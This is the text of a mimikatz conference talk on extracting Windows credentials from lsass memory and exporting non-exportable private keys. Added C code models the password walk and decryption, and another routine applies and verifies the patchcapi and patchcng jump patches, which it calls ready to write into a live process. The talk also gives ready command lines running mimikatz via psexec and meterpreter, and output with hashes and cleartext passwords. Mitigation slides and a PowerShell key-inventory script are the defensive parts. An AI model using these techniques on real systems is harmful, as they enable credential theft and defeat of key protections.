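    uint32_t LuidLow; int32_t LuidHigh;     /* LUID */
    uint16_t Length, MaximumLength;         /* LSA_UNICODE_STRING Password */
    uint32_t Buffer;
} IMG_SESSION;
typedef struct { uint32_t g_cbRandomKey, g_pRandomKey; } IMG_LSASRV;

enum { ADDR_HEAD = 0x000, ADDR_S1 = 0x010, ADDR_S2 = 0x030, ADDR_LSASRV = 0x050,
       ADDR_KEY = 0x060, ADDR_PW1 = 0x100, ADDR_PW2 = 0x140 };

/* Stand-in for ReadProcessMemory(): every pointer is fetched through this,
   and a bad pointer is an error rather than a crash. */
static int read_remote(uint32_t addr, void *out, uint32_t len) {
    if (len > IMG_SIZE || addr > IMG_SIZE - len) return 0;
    memcpy(out, g_image + addr, len);
    return 1;
}

/* RC4: the NT5 cipher for secrets whose size is not a multiple of 8. */
static void rc4(const uint8_t *key, uint32_t klen, uint8_t *buf, uint32_t len) {
    uint8_t S[256], t; unsigned i, j;
    for (i = 0; i < 256; i++) S[i] = (uint8_t)i;
    for (i = j = 0; i < 256; i++) {
        j = (j + S[i] + key[i % klen]) & 0xff; t = S[i]; S[i] = S[j]; S[j] = t;
    }
    for (i = j = 0; len--; buf++) {
        i = (i + 1) & 0xff; j = (j + S[i]) & 0xff; t = S[i]; S[i] = S[j]; S[j] = t;
        *buf ^= S[(S[i] + S[j]) & 0xff];
    }
}

/* Constructed sample image: two logon sessions whose UTF-16LE passwords are
   left RC4-protected under a constructed 16-byte key, as LsaProtectMemory
   would leave them (the real g_cbRandomKey on the slide is 256). */
static const uint8_t SAMPLE_KEY[16] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};

static void put_session(uint32_t at, uint32_t flink, uint32_t blink,
                        uint32_t luid, const char *pw, uint32_t pwaddr) {
    IMG_SESSION s = { flink, blink, luid, 0, 0, 0, pwaddr };
    uint32_t n = (uint32_t)strlen(pw), k;
    for (k = 0; k < n; k++) { g_image[pwaddr + 2*k] = (uint8_t)pw[k]; g_image[pwaddr + 2*k + 1] = 0; }
    rc4(SAMPLE_KEY, sizeof SAMPLE_KEY, g_image + pwaddr, 2 * n);   /* "protect" it */
    s.Length = s.MaximumLength = (uint16_t)(2 * n);
    memcpy(g_image + at, &s, sizeof s);
}

void build_sample_image(void) {
    IMG_LSASRV l = { sizeof SAMPLE_KEY, ADDR_KEY };
    uint32_t head[2] = { ADDR_S1, ADDR_S2 };
    memset(g_image, 0, sizeof g_image);
    memcpy(g_image + ADDR_HEAD, head, sizeof head);
    memcpy(g_image + ADDR_LSASRV, &l, sizeof l);
    memcpy(g_image + ADDR_KEY, SAMPLE_KEY, sizeof SAMPLE_KEY);
    put_session(ADDR_S1, ADDR_S2, ADDR_HEAD, 0x3e7,   "svc-k1wi!", ADDR_PW1);
    put_session(ADDR_S2, ADDR_HEAD, ADDR_S1, 0x39f8b, "waza-1234", ADDR_PW2);
}

/* The sekurlsa step for one LUID: copy the key out of "lsasrv", walk the list,
   pull the protected string, decrypt locally. Returns the password length in
   characters, 0 if the LUID has no entry, -1 on a bad read or on a size that
   would have gone to DESx (not modelled here). */
int extract_password(uint32_t luid_low, char *out, size_t outlen) {
    IMG_LSASRV l; uint8_t key[256], buf[256]; IMG_SESSION s; uint32_t cur; int hops = 0;
    if (!read_remote(ADDR_LSASRV, &l, sizeof l)) return -1;
    if (l.g_cbRandomKey == 0 || l.g_cbRandomKey > sizeof key) return -1;
    if (!read_remote(l.g_pRandomKey, key, l.g_cbRandomKey)) return -1;   /* key "import" */
    if (!read_remote(ADDR_HEAD, &cur, sizeof cur)) return -1;             /* head.Flink */
    while (cur != ADDR_HEAD) {
        if (++hops > 1024 || !read_remote(cur, &s, sizeof s)) return -1;  /* corrupt list */
        if (s.LuidLow == luid_low && s.LuidHigh == 0) {
            size_t n = s.Length / 2, k;
            if (s.Length == 0 || s.Length > sizeof buf || s.Length % 8 == 0) return -1;
            if (!read_remote(s.Buffer, buf, s.Length)) return -1;
            rc4(key, l.g_cbRandomKey, buf, s.Length);   /* what LsaUnprotectMemory does inside LSASS */
            if (n + 1 > outlen) return -1;
            for (k = 0; k < n; k++) out[k] = (char)buf[2*k];   /* UTF-16LE -> ASCII (sample is ASCII) */
            out[n] = 0;
            return (int)n;
        }
        cur = s.Flink;
    }
    return 0;
}

/* Rebuilds the sample image and checks one LUID against an expected password. */
int luid_has_password(uint32_t luid_low, const char *expect) {
    char pw[64];
    build_sample_image();
    return extract_password(luid_low, pw, sizeof pw) > 0 && strcmp(pw, expect) == 0;
}

int main(void) {
    char pw[64];
    build_sample_image();
    printf("LUID 0x39f8b -> %s\n", extract_password(0x39f8b, pw, sizeof pw) > 0 ? pw : "(not found)");
    return 0;
}
```

Nothing is executed inside the "target": the key and the protected buffer are both just bytes read out, which is why the same walk works on a memory dump of lsass.exe as well as on a live process.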
mimikatz :: sekurlsa :: LsaEncryptMemory : NT6
Depending on the size of the secret, LsaEncryptMemory uses:
 - 3DES
 - AES
[Figure: NT6 key material. In lsass, lsasrv.dll holds InitializationVector (BYTE[16]), h3DesKey and hAesKey; each handle points to a KIWI_BCRYPT_KEY whose "cle" member points to the KIWI_BCRYPT_KEY_DATA holding the raw key. mimikatz copies these into its own copy of lsasrv.]

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa :: memo
Security packages:

  Package         Symbol                                Type
  tspkg           tspkg!TSGlobalCredTable               RTL_AVL_TABLE
  wdigest         wdigest!l_LogSessList                 LIST_ENTRY
  livessp         livessp!LiveGlobalLogonSessionList    LIST_ENTRY
  kerberos (nt5)  kerberos!KerbLogonSessionList         LIST_ENTRY
  kerberos (nt6)  kerberos!KerbGlobalLogonSessionTable  RTL_AVL_TABLE
  msv1_0          lsasrv!LogonSessionList               LIST_ENTRY
                  lsasrv!LogonSessionListCount          ULONG

Protection keys:

  Key    NT5 symbols
  RC4    lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
  DESx   lsasrv!g_pDESXKey, lsasrv!g_Feedback

  Key    NT6 symbols
  (IV)   lsasrv!InitializationVector
  3DES   lsasrv!h3DesKey
  AES    lsasrv!hAesKey
mimikatz :: sekurlsa :: memo
Some commands:
  mimikatz "privilege::debug" "sekurlsa::logonPasswords full" exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

(mimikatz output, labels translated from French)

mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Request to ENABLE privilege: SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentication Id      : 0;234870
Authentication package : NTLM
Primary user           : Gentil Kiwi
Authentication domain  : vm-w8-rp-x
        msv1_0 :
         * User      : Gentil Kiwi
         * Domain    : vm-w8-rp-x
         * LM hash   : d0e9aee149655a6075e4540af1f22d3b
         * NTLM hash : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * User      : Gentil Kiwi
         * Domain    : vm-w8-rp-x
         * Password  : waza1234
        wdigest :
         * User      : Gentil Kiwi
         * Domain    : vm-w8-rp-x
         * Password  : waza1234
        tspkg :
         * User      : Gentil Kiwi
         * Domain    : vm-w8-rp-x
         * Password  : waza1234
        livessp : nt (LUID KO)
mimikatz :: sekurlsa :: what we can do?
Basics:
 - no physical access to the computer (first step to pass-the-hash, then pass-the-pass)
 - no admin rights / system rights / debug privileges (…)
 - disable local admin accounts
 - strong passwords (haha, it was a joke, so useless!)
 - for privileged accounts, network logon instead of interactive (when possible)
 - audit: pass-the-hash leaves traces and can lock accounts
 - no admin rights / system rights / debug privileges, even for VIPs
 - use a separate network (or forest) for privileged tasks
More in depth:
 - force strong authentication (smartcard & token) $ €
 - short validity for Kerberos tickets
 - no delegation
 - disable NTLM (available with NT6)
 - nothing exotic:
   * biometrics (it keeps the password somewhere and pushes it to Windows)
   * single sign-on
 - stop shared secrets for authentication, push public/private stuff (like keys ;))
 - leave opportunities to stop retro-compatibility
 - disable faulty providers:
   * is it supported by Microsoft?
   * even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto : what is it?
A little module that I wrote to:
 - play with the Windows Cryptographic API, CNG and RSA keys
 - automate the export of certificates/keys
   * even those which are "not" exportable
What the crypto module can do:
 - list:
   * providers
   * stores
   * certificates
   * keys
 - export:
   * certificates
     - public, in DER format
     - with private keys, in PFX format
   * private keys in PVK format (it's cool, OpenSSL can deal with it too)
 - patch:
   * CryptoAPI in the mimikatz context
   * CNG in the LSASS context (again!)
(mod_mimikatz_crypto)
mimikatz :: crypto : how it's protected?
Private keys are DPAPI protected:
 - you cannot reuse private key files on another computer
   * at least not without the master keys and/or the users' passwords
A computer/user can load its own keys because it has enough secrets to do it (e.g. a session is opened)
 - yes, a computer/server opens a "session" too
Export/usage can be limited by:
 - password
 - popup
 - Export/Archive flag not present
(Password / popup: a constraint for most users, unavailable for computer keys.)
Importing as non-exportable:
  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi : how it works?
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
 - http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard reader…
 - cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi : how it's exported? (PLAYSKOOL level)
[Figure: export flow. Process -> CryptoAPI and RSA CSP: "ask to export key" -> load private key (DPAPI decode) -> exportable? yes -> exported key; no -> NTE_BAD_KEY_STATE.]
mimikatz :: crypto :: patchcapi : because I own my process
When we want to export a certificate with its private key (or only the key), it goes through rsaenh!CPExportKey.
This function does all the work to prepare the export, and checks whether the key is exportable.

mimikatz # crypto::exportCertificates
Location : 'CERT_SYSTEM_STORE_CURRENT_USER\My'
 - Benjamin Delpy
        Key container : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider      : Microsoft Enhanced Cryptographic Provider v1.0
        Type          : AT_KEYEXCHANGE
        Exportable    : NO
        Key size      : 2048
        Private export in 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Key not valid for use in specified state.
        Public export in 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

(certutil on the same key, output translated from French)
================ Certificate 0 ================
Serial Number: 112169417a1c3ef46a301f99385f50680fa0
Issuer: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Subject: CN=Benjamin Delpy, C=FR
Non-root Certificate
Cert Hash(sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Key Container = 470ADFBA-8718-4014-B05E-B30776B75A03
  Provider = Microsoft Enhanced Cryptographic Provider v1.0
  Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.

(Exportable: NO, in both cases.)
mimikatz :: crypto :: patchcapi : because I own my process
So what? A module in my own process returns that I can't do something?
CryptoAPI is in my memory space: let's patch it!
I wrote "4" bytes in my memory space:

  before:
  .text:0AC0B7CB  0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
  after:
  .text:0AC0B7CB  90                   nop
  .text:0AC0B7CC  E9 33 C7 FF FF       jmp  continue_key_export_or_archive

  before:
  .text:0AC1F749  0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
  after:
  .text:0AC1F749  90                   nop
  .text:0AC1F74A  E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi : demo time!
Import, export, import as not exportable… export!
mimikatz :: crypto :: patchcapi : limitations
Because:
 - I'm lazy
 - I've seen, in the majority of cases, RSA keys for real-life use
   * elliptic curve, a little…
crypto::patchcapi only deals with:
 - Microsoft Base Cryptographic Provider v1.0
 - Microsoft Enhanced Cryptographic Provider v1.0
 - Microsoft Enhanced RSA and AES Cryptographic Provider
 - Microsoft RSA SChannel Cryptographic Provider
 - Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng : how it works?
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
 - http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with Common Criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not performed in the "user" process context.
Processes use RPC to call "Key Isolation service" (keyiso) functions.
It seems more secure than CryptoAPI…
 - it is, but it's not perfect…
mimikatz :: crypto :: cng : how it's exported? (PLAYSKOOL level)
[Figure: export flow. Process -> CNG -> RPC -> KeyIso service (LSASS process; on NT6 a SYSTEM process protected by the ML_SYSTEM mandatory label with SYSTEM_MANDATORY_LABEL_NO_WRITE_UP / SYSTEM_MANDATORY_LABEL_NO_READ_UP): "ask to export key" -> load private key (DPAPI decode) -> exportable? yes -> exported key; no -> NTE_NOT_SUPPORTED.]
mimikatz :: crypto :: patchcng : because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey.
This function does all the work to prepare the export, and checks whether the key is exportable.

mimikatz # crypto::exportKeys [user]
CNG keys:
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportable : NO
        Key size   : 2048
        Private export in 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
        mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK (0x80090029) The requested operation is not supported.

(Exportable: NO.)
mimikatz :: crypto :: patchcng : because sometimes I own LSASS
This time, the checks and the keys are in the LSASS process… and what?
I wrote "1" byte in the LSASS memory space…

  before:
  .text:6C815210  75 1C    jnz  short continue_key_export
  after:
  .text:6C815210  EB 1C    jmp  short continue_key_export
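The byte-level edit behind crypto::patchcapi (the two rsaenh sites shown earlier) and crypto::patchcng (the ncrypt site just above), as an added example that is not mimikatz code, applied to a constructed buffer holding the slides' bytes rather than to a loaded DLL. It shows why the displacement can be left alone in both forms: in the near form the `nop` moves the start of the jump one byte forward, so a 5-byte `jmp rel32` ends exactly where the 6-byte `jnz rel32` ended and the same rel32 resolves to the same target; in the short form the opcode is simply swapped. A `jnz continue_key_export` is taken when the exportability check comes out non-zero; forcing it to `jmp` makes the "not exportable" outcome (ZF=1) take the export path too. The target addresses asserted in `slide_patches_ok()` are computed from the listed bytes and addresses; locating the sites in a real module and making the page writable (VirtualProtect, or WriteProcessMemory for patchcng) are outside this model.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The two byte patterns from the slides, at their listed addresses. */
const uint8_t CAPI_JNZ[6] = { 0x0F, 0x85, 0x33, 0xC7, 0xFF, 0xFF };  /* rsaenh .text:0AC0B7CB */
const uint8_t CNG_JNZ[2]  = { 0x75, 0x1C };                           /* ncrypt .text:6C815210 */

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Address the jump at code[off] resolves to when the buffer is mapped at
   `base`; handles jnz/jmp rel32 and jnz/jmp rel8. Returns 0 if the bytes
   there are not one of those jumps. Unsigned wrap-around handles negative
   displacements. */
uint32_t jump_target(const uint8_t *code, size_t len, size_t off, uint32_t base) {
    if (off + 6 <= len && code[off] == 0x0F && code[off + 1] == 0x85)      /* jnz rel32 */
        return base + (uint32_t)off + 6 + rd32(code + off + 2);
    if (off + 5 <= len && code[off] == 0xE9)                                /* jmp rel32 */
        return base + (uint32_t)off + 5 + rd32(code + off + 1);
    if (off + 2 <= len && (code[off] == 0x75 || code[off] == 0xEB))         /* jnz/jmp rel8 */
        return base + (uint32_t)off + 2 + (uint32_t)(int32_t)(int8_t)code[off + 1];
    return 0;
}

/* Is control transferred when the instruction at code[off] runs with the
   given ZF? A leading nop (what the near patch leaves behind) falls through. */
int takes_jump(const uint8_t *code, size_t len, size_t off, int zf) {
    if (off < len && code[off] == 0x90) off++;
    if (off + 2 <= len && code[off] == 0x0F && code[off + 1] == 0x85) return !zf;
    if (off + 1 <= len && code[off] == 0x75) return !zf;
    if (off + 1 <= len && (code[off] == 0xE9 || code[off] == 0xEB)) return 1;
    return 0;
}

/* The edit itself. Returns the number of bytes changed: 2 for the near form
   (0F 85 -> 90 E9), 1 for the short form (75 -> EB), 0 if there is no jnz. */
size_t force_jump(uint8_t *code, size_t len, size_t off) {
    if (off + 6 <= len && code[off] == 0x0F && code[off + 1] == 0x85) {
        code[off] = 0x90;       /* nop: the following jmp is 5 bytes long...      */
        code[off + 1] = 0xE9;   /* ...and ends where the 6-byte jnz ended, so rel32 is reused */
        return 2;
    }
    if (off + 2 <= len && code[off] == 0x75) {
        code[off] = 0xEB;       /* same length, rel8 untouched */
        return 1;
    }
    return 0;
}

/* Patch and verify: 1 only if a jnz was found and the rewritten jump still
   resolves to the same address. This is the check worth running before the
   bytes go into a live process. */
int force_jump_checked(uint8_t *code, size_t len, size_t off, uint32_t base) {
    uint32_t before = jump_target(code, len, off, base), after;
    size_t n;
    if (!before) return 0;
    n = force_jump(code, len, off);
    if (!n) return 0;
    after = jump_target(code, len, off + (n == 2 ? 1 : 0), base);
    return before == after;
}

/* Self-check on the slides' bytes: both patches keep their targets, and the
   "not exportable" case (ZF=1) goes from fall-through to taken. */
int slide_patches_ok(void) {
    uint8_t capi[6], cng[2];
    memcpy(capi, CAPI_JNZ, sizeof capi);
    memcpy(cng, CNG_JNZ, sizeof cng);
    if (jump_target(capi, 6, 0, 0x0AC0B7CBu) != 0x0AC07F04u) return 0;   /* 0AC0B7D1 - 0x38CD */
    if (takes_jump(capi, 6, 0, 1) || !takes_jump(capi, 6, 0, 0)) return 0;
    if (!force_jump_checked(capi, 6, 0, 0x0AC0B7CBu)) return 0;
    if (!takes_jump(capi, 6, 0, 1) || capi[0] != 0x90 || capi[1] != 0xE9) return 0;
    if (jump_target(cng, 2, 0, 0x6C815210u) != 0x6C81522Eu) return 0;     /* 6C815212 + 0x1C */
    if (takes_jump(cng, 2, 0, 1)) return 0;
    if (!force_jump_checked(cng, 2, 0, 0x6C815210u)) return 0;
    if (!takes_jump(cng, 2, 0, 1) || cng[0] != 0xEB) return 0;
    return 1;
}

int main(void) {
    printf("slide patches keep their targets and force the export path: %s\n",
           slide_patches_ok() ? "yes" : "no");
    return 0;
}
```

The same check is the one to apply to any hand-made code patch: recompute the branch target from the new bytes and compare it with the old one before writing, since a wrong displacement does not fail loudly, it sends the export path into whatever happens to sit at the new address.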
mimikatz :: crypto :: patchcng : demo time!
Import, export, import as not exportable… export again!
mimikatz :: crypto :: patchcng : limitations
The patch operation needs some privileges:
 - admin (debug privilege)
 - SYSTEM
crypto::patchcng only deals with:
 - Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC certificates snap-in cannot export CNG certificates… even those that are exportable (hu?)
 - certutil can…
mimikatz :: crypto :: patchcng : bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports:
 - until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too:
 - yeah, like the good old certutil!

(certutil output translated from French)

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[...]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
  Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.

(after crypto::patchcng)
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[...]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Encryption test passed
CertUtil: -exportPFX command completed successfully.
mimikatz crypto memo
mimikatz crypto memo
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password – PFX files are protected by this password: mimikatz
Keys – When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it? • So yes, mimikatz can export it
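A defender's check for the two points above (duplicate key containers after re-import, private keys left behind after a certificate is deleted), written as an added example that is not part of the talk or of mimikatz. It assumes Windows PowerShell and the default CAPI key-container locations; CNG keys are stored elsewhere and are only reported, not matched against disk.

```powershell
# Added example, not from the talk: inventory the private keys behind the
# certificates in a store and flag CAPI key containers on disk that no certificate
# in that store references (the leftovers the talk describes after deletion or re-import).
# Assumes Windows PowerShell and the default CAPI key locations; CNG keys are only reported.

function Get-PrivateKeyInventory {
    param([ValidateSet('CurrentUser', 'LocalMachine')][string]$StoreLocation = 'CurrentUser')
    $certs = Get-ChildItem -Path "Cert:\$StoreLocation\My" | Where-Object HasPrivateKey
    foreach ($cert in $certs) {
        $info = $null
        try {
            # Non-null only for CAPI (CSP) keys; CNG keys and keys we cannot open give $null.
            $info = $cert.PrivateKey.CspKeyContainerInfo
        } catch {
            $info = $null
        }
        [pscustomobject]@{
            Subject    = $cert.Subject
            Thumbprint = $cert.Thumbprint
            NotAfter   = $cert.NotAfter
            Provider   = if ($info) { $info.ProviderName } else { 'CNG or key not accessible' }
            Container  = if ($info) { $info.KeyContainerName } else { $null }
            KeyFile    = if ($info) { $info.UniqueKeyContainerName } else { $null }
            # CRYPT_EXPORTABLE as reported by the CSP. The talk shows this flag is checked
            # inside the calling process, so read it as a hint for triage, not as a control.
            Exportable = if ($info) { $info.Exportable } else { $null }
        }
    }
}

function Get-OrphanedCapiKeyFiles {
    param(
        [ValidateSet('CurrentUser', 'LocalMachine')][string]$StoreLocation = 'CurrentUser',
        [object[]]$Inventory = @(Get-PrivateKeyInventory -StoreLocation $StoreLocation)
    )
    # CAPI key container files: per-user under %APPDATA%, computer keys under MachineKeys.
    $keyRoot = if ($StoreLocation -eq 'CurrentUser') {
        Join-Path $env:APPDATA 'Microsoft\Crypto\RSA'
    } else {
        Join-Path $env:ProgramData 'Microsoft\Crypto\RSA\MachineKeys'
    }
    if (-not (Test-Path -Path $keyRoot)) { return }
    $referenced = @($Inventory | Where-Object KeyFile | ForEach-Object KeyFile)
    # Each file is one key container; one not referenced by any certificate in the
    # store is a candidate leftover to review (other stores may still reference it).
    Get-ChildItem -Path $keyRoot -Recurse -File |
        Where-Object { $referenced -notcontains $_.Name } |
        Select-Object FullName, Length, LastWriteTime
}

$inventory = @(Get-PrivateKeyInventory -StoreLocation 'CurrentUser')
$inventory | Format-Table Subject, Provider, Exportable, KeyFile -AutoSize
Get-OrphanedCapiKeyFiles -StoreLocation 'CurrentUser' -Inventory $inventory | Format-Table -AutoSize
```

Keys that belong to certificates in other stores (or to scheduled tasks and services) also live under these directories, so treat the orphan list as a review queue rather than a delete list.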
mimikatz :: crypto :: what we can do?
Exactly the same as for sekurlsa: it will prevent access to accounts / computer – no admin, no admin, no admin…
Basics
– Use smartcards/tokens for users' certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with TPM from Windows 8
• Virtual SmartCard seems promising
– Verify vendors' implementation (Lenovo, Dell, …) of TPM CSP/KSP
• Their biometrics stuff was a little buggy ;)
mimikatz :: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz :: that's all folks!
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity • Partners and Sponsors for sure!
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges • nagual, newsoft, mubix, …
– You for your attention!
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: wdigest
because clear text password over http/https is not cool!
mimikatz :: sekurlsa :: wdigest :: what is it?
“Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network. […]” – Wikipedia, http://en.wikipedia.org/wiki/Digest_access_authentication
“Common Digest Authentication Scenarios – Authenticated client access to a Web site – Authenticated client access using SASL – Authenticated client access with integrity protection to a directory service using LDAP” – Microsoft, http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool:
– No password over the network, just hashes
– No reversible password in Active Directory, hashes for each realm
• Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest :: what is it?
We speak about hashes, but what hashes? H = MD5(HA1:nonce:[…]:HA2)
• HA1 = MD5(username:realm:password)
• HA2 = MD5(method:digestURI[:…])
Even after login, HA1 may change… the realm is chosen on the server side and cannot be determined before Windows logon.
The WDigest provider must have the elements to compute responses for different servers:
– Username
– Realm (from server)
– Password
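The HA1/HA2/response computation above, carried through for one user against two servers announcing different realms, as an added example that is not part of the talk. The user name, password, realms, nonce and client nonce are constructed sample values.

```powershell
# Added example, not from the talk: the RFC 2617 Digest computation, to show why
# HA1 depends on the realm the server announces and so cannot be precomputed at
# Windows logon. User, password, nonces and realms below are constructed samples.

function Get-Md5Hex {
    param([Parameter(Mandatory)][string]$Text)
    $md5 = [System.Security.Cryptography.MD5]::Create()
    try {
        $hash = $md5.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Text))
    } finally {
        $md5.Dispose()
    }
    return ([System.BitConverter]::ToString($hash) -replace '-', '').ToLowerInvariant()
}

function Get-DigestResponse {
    param(
        [Parameter(Mandatory)][string]$Username,
        [Parameter(Mandatory)][string]$Realm,
        [Parameter(Mandatory)][string]$Password,
        [string]$Method = 'GET',
        [string]$Uri = '/',
        [Parameter(Mandatory)][string]$Nonce,
        [string]$NonceCount = '00000001',
        [Parameter(Mandatory)][string]$CNonce,
        [string]$Qop = 'auth'
    )
    # HA1 binds the password to a realm chosen by the server.
    $ha1 = Get-Md5Hex "${Username}:${Realm}:${Password}"
    # HA2 depends only on the request (method and URI).
    $ha2 = Get-Md5Hex "${Method}:${Uri}"
    # The response mixes in the server nonce, the client nonce and the counter.
    $response = Get-Md5Hex "${ha1}:${Nonce}:${NonceCount}:${CNonce}:${Qop}:${ha2}"
    [pscustomobject]@{ Realm = $Realm; HA1 = $ha1; HA2 = $ha2; Response = $response }
}

# Constructed sample: same user and password, two servers with different realms.
$user   = 'gentilkiwi'
$pass   = 'CorrectHorseBatteryStaple'
$nonce  = 'dcd98b7102dd2f0e8b11d0f600bfb0c093'
$cnonce = '0a4f113b'

$results = foreach ($realm in @('intranet.example', 'mail.example')) {
    Get-DigestResponse -Username $user -Realm $realm -Password $pass -Nonce $nonce -CNonce $cnonce
}
$results | Format-Table -AutoSize

# Two different HA1 values for one password: a client that must answer any realm
# later has to keep either the password or one derived secret per realm.
if ($results[0].HA1 -ne $results[1].HA1) {
    'HA1 differs per realm; the realm is only known once the server challenges.'
}
```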
mimikatz :: sekurlsa :: wdigest :: theory
This time we know:
– that WDigest keeps the password in memory « by protocol » for the HA1 digest
– that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
LsaUnprotectMemory
– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– Let's search for it in WDigest
– Hypothesis seems verified
LsaProtectMemory
– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– Let's search for it in WDigest
– SpAcceptCredentials takes the clear password in its args
• Protects it with LsaProtectMemory
• Updates or inserts data in the double linked list wdigest!l_LogSessList
.text:7409D151  _DigestCalcHA1@8         call    dword ptr [eax+0B4h]
.text:74096C69  _SpAcceptCredentials@16  call    dword ptr [eax+0B0h]
mimikatz :: sekurlsa :: wdigest :: workflow
